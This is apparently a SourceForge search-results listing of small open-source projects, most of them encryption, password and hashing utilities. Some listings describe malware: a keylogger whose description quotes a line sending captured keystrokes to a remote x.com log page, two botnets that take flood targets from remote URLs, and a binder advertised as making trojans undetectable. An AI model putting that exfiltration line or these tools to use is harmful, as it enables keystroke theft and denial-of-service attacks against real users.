Showing 365 open source projects for "gw-basic"

View related business solutions
  • Custom VMs From 1 to 96 vCPUs With 99.95% Uptime Icon
    Custom VMs From 1 to 96 vCPUs With 99.95% Uptime

    General-purpose, compute-optimized, or GPU/TPU-accelerated. Built to your exact specs.

    Live migration and automatic failover keep workloads online through maintenance. One free e2-micro VM every month.
    Try Free
  • MongoDB Atlas runs apps anywhere Icon
    MongoDB Atlas runs apps anywhere

    Deploy in 115+ regions with the modern database for every enterprise.

    MongoDB Atlas gives you the freedom to build and run modern applications anywhere—across AWS, Azure, and Google Cloud. With global availability in over 115 regions, Atlas lets you deploy close to your users, meet compliance needs, and scale with confidence across any geography.
    Start Free
  • 1
    ActiveLock is an open-source copy protection, software licensing framework for all development enviroments supporting COM+ architecture. Core DLL available in VB2008 and VB6. Samples in C++, C#, Excel/Access VBA and keygens in PHP, ASP.NET available.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 2
    Encrypter

    Encrypter

    Encrypter is a free folder encrypting and hiding utility software.

    Encrypter is a free folder encrypting and hiding utility software for Windows 32bit platform. Encrypter is powerful but lightweight software written in VB.NET for Windows 7, Vista and XP.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 3

    PC Tools by Davis PC Mechanics

    system diagnostics tool

    PC Tools by Davis PC Mechanics is a tool used to perform some basic administrative tasks to help make thigs quicker by being all in one spot. Rather than a console application, i made an interface so you can quickly point and click. there is also a command line so you can type if you want to. some commands in the program require an elevated permission, before you open the program, use the "run as administrator" feature for full capibility
    Downloads: 0 This Week
    Last Update:
    See Project
  • 4

    basic-MITM

    basic man in the middle attack implementation

    basic man in the middle attack implementation written in python langage
    Downloads: 0 This Week
    Last Update:
    See Project
  • Try Google Cloud Risk-Free With $300 in Credit Icon
    Try Google Cloud Risk-Free With $300 in Credit

    No hidden charges. No surprise bills. Cancel anytime.

    Use your credit across every product. Compute, storage, AI, analytics. When it runs out, 20+ products stay free. You only pay when you choose to.
    Start Free
  • 5
    Fractal Encryption was once a dream, this is a quest to find the ultimate encryption layers behind the FES Protocol Released in ANTdb 2005.. It in it own base is the module to drive geometric fractal interlaced data.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 6
    FileEraser

    FileEraser

    Programm, um sicher Dateien zu löschen.

    Aktuelle Version 0.2.2013.111 Changelog: http://sourceforge.net/p/fravidofilekill/blog/ Ein Programm für das sicher Löschen von Dateien. Komplette Ordner mit/ohne Unterordner können gelöscht werden. License: Creative Commons (CC BY-ND 3.0) Namensnennung-Keine Bearbeitung 3.0 Unported (http://creativecommons.org/licenses/by-nd/3.0/deed.de)
    Downloads: 0 This Week
    Last Update:
    See Project
  • 7
    Password Protector

    Password Protector

    Encrypt and protect passwords and usernames

    Password Protector allows you to securely store your passwords and usernames in one place using AES256 for encryption, which is the recommended cryptosystem used in Banks. Password Protector uses a master password to encrypt your passwords, but it can also use optional 'key files' - small files that are required for the encryption/decryption process. You can put the file on any portable storage you keep with you (USB sticks, phones, music players...) to add an extra layer of security -...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 8
    Hash Calculator

    Hash Calculator

    MD5/SHA1 file and string hash calculator

    Hash Calculator is a small tool to calculate hash values from files and string input. Only md5 and sha1 supported at the moment. Option to export hash results to a text file.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 9
    GenKIZ

    GenKIZ

    Software creating passwords based on keywords user.

    Logiciel de création de mots de passe basés sur des mots-clés utilisateur. (Interface en langue allemande, anglaise, espagnole, française, italienne, russe) Software creating passwords based on keywords of the user. (Interface Languages German, English, Spanish, French, Italian, Russian)
    Downloads: 0 This Week
    Last Update:
    See Project
  • Go From AI Idea to AI App Fast Icon
    Go From AI Idea to AI App Fast

    One platform to build, fine-tune, and deploy ML models. No MLOps team required.

    Access Gemini 3 and 200+ models. Build chatbots, agents, or custom models with built-in monitoring and scaling.
    Try Free
  • 10

    sape

    self defense system

    ...It detects attacks and it responses with isolation attacks. It's supposed to be on the same network of the protected hosts. It must be capable to see all the traffic. It's a basic IPS with a self defense module. So it can prevents future attacks from the same hosts, which is identified by its mac address.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 11
    mFileBinder

    mFileBinder

    An advanced file binder which binds multiple file of any type

    mFileBinder is an advanced file binder which binds multiple file of any type and merges into a single executable file. mFileBinder uses rijndael encryption algorithm to encrypt the file which can make Virus / Trojans Fully Undetectable. Set the drop location of all files and set the execution mode(Background,Foreground) of each file. Predefined set of ICON Package is included set your desired icon. Silently extracts and sequentially execute files.
    Downloads: 4 This Week
    Last Update:
    See Project
  • 12

    EqSolve

    Java brute force system of equations solver

    The goal of this project is to create a java file that can be hardcoded with any system of equations. The java file can then be compiled and will solve for unknowns using a basic "guess and check" method.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 13
    Secure Password Generator

    Secure Password Generator

    SPG generates secure randomised passwords.

    Secure Password Generator, is a generator that generates secure randomised bits compromised of lower & upper cased characters, numerical values and symbols. This generates a 15 bit length string, which is the industry standard bit value for passwords. Planning: - General polish and refinements, as-well as documentation.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 14
    BackTrack codename whydah R1 Release

    BackTrack codename whydah R1 Release

    Penetration Testing and Security Auditing Linux Distribution

    ...With BackTrack you can easily grasp the concepts and understand the techniques to perform wireless attacks in your own lab. Get started with wireless testing, security and hacking with basic wireless concepts.
    Downloads: 6 This Week
    Last Update:
    See Project
  • 15
    Janilogger

    Janilogger

    Visual Basic based keylogger program

    Janilogger collects keystrokes to a textbox. And send the collected data to website panel. The asp file send datas to database. For example: You uploaded your log.asp to x.com . Janilogger sends datas to your database via log.asp with this command Webbrowser1.Navigate("http://www.x.com/log.asp?yaz=text1.text") -Log.asp included in source files
    Downloads: 1 This Week
    Last Update:
    See Project
  • 16
    Floodtrooper Http Botnet

    Floodtrooper Http Botnet

    Visual Basic based http botnet program

    Floodtrooper is a http botnet program which takes its commands from a txt file on given URL. -It takes target IP from: http://www.x.com/floodtrooper/ip.txt commands from: http://www.x.com/floodtrooper/komut.txt and you can see how many botnet you have with an asp or php file which shows you online users(you can use whos.among.us) http://www.x.com/user/online.asp -It copies itself to startup -It has ping flood attack method (you can develop this it's weakest way to make dos)
    Downloads: 0 This Week
    Last Update:
    See Project
  • 17
    Quick Check

    Quick Check

    Quick Check is a small MD5 comparison program.

    Quick Check is a small MD5 comparison program, that uses a class provided by "IranianExperts". At this point in the project it just compares MD5 however in the future it might support SHA1 and others. When you first open the program you are greeted with a small form that contains two text boxes and one button. First you enter the hash of the file you got from where you downloaded, next click the button and browse to the downloaded file and the program will retrieve the MD5 hash and compare....
    Downloads: 0 This Week
    Last Update:
    See Project
  • 18
    CryBit Password

    CryBit Password

    Safe and Simple

    Crybit Password Password Storage Software and on growing For details and Support: http://monstersoftware.clan.su Crybit Password Parola Saklama Yazılımdır ve Her Geçen Gün Gelişmektedir Detaylar Ve Destek için: http://monstersoftware.clan.su
    Downloads: 0 This Week
    Last Update:
    See Project
  • 19
    Janibot Irc Botnet

    Janibot Irc Botnet

    Irc controlling botnet

    It's a botnet which controlling via irc server. It has udp and ping flood attack methods
    Downloads: 1 This Week
    Last Update:
    See Project
  • 20
    Credit Card Validator

    Credit Card Validator

    Tool to validate your credit card numbers.

    This tool will verify the credit card numbers entered is valid or not. Supports almost all brands.
    Downloads: 2 This Week
    Last Update:
    See Project
  • 21
    Open Nod32 Keyfinder

    Open Nod32 Keyfinder

    Find licences for your ESET anti-virus fast and easy.

    Apply the KISS Rule. KEEP IT SIMPLE STUPID! Find your ESET Smart Security and ESET Nod 32 Anti-Virus Licences (Username and password). Just like that, you press a button and you see the list of usernames and passwords ready for you to copy them. This proyect was born as "Elemental Nod32 Keyfinder". It was my first time with Regular Expressions and it was a total success :D Now i have decided to release it with a gorgeous GPL v3 (or higher) so you can undersand how this works. Enjoy!
    Downloads: 0 This Week
    Last Update:
    See Project
  • 22

    TCP/UDP footprint analysis

    TCP/UDP endpoint analysis and mapping utility.

    Providing users the ability to with accuracy map all inbound and outbound TCP/UDP connections to a Process ID and process owner. The application will also map a port to various performance metrics like processor and memory utilization.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 23
    Dir2Encrypt
    Dir2Encrypt encrypt a folder with privat files and subfolders into a single password protected archive file. The archive file can be a zip file or a self extracting exe file. Microsoft Net Framwork 2 has to be installed.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 24
    PULSE

    PULSE

    Php User Login System Exentended

    Php User Login System Extended Welcome to Pulse, a free and secure user management system written in PHP. It can be used easily: it contains a basic web interface (100% customizable), an handy installer...and the engine, of course. Pulse will make your life easier making you avoid wasting time on writing a login system for your application. The most frequently used features are already implemented into Pulse, so you can't help thinking about Machiavellian ways to realize your projects. ...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 25

    Stegno

    This project is created for providing basic stegnography concept.

    THESE PROGRAMS JUST PROVIDES BASIC Stenography CONCEPT. ENCRYPTION 1. RUN Encryptor.CLASS (WITH APPROPRIATE JAVA ENV.) 2. PROVIDE APPROPRIATE PARAMETERS. • source_file_name : (NAME OF FILE TO WHICH target_file_name IS TO BE EMBEDDED) • target_file_name : (NAME OF FILE WHICH SHOULD BE EMBEDDED ) • output_file_name : (NAME OF OUTPUT FILE) e.g. java Encryptor original.mp3 hideme.mp3 hidden.mp3 (space will be used for separating parameters) [source_file_name] [target_file_name] [output_file_name] DECRYPTION 1. ...
    Downloads: 0 This Week
    Last Update:
    See Project
MongoDB Logo MongoDB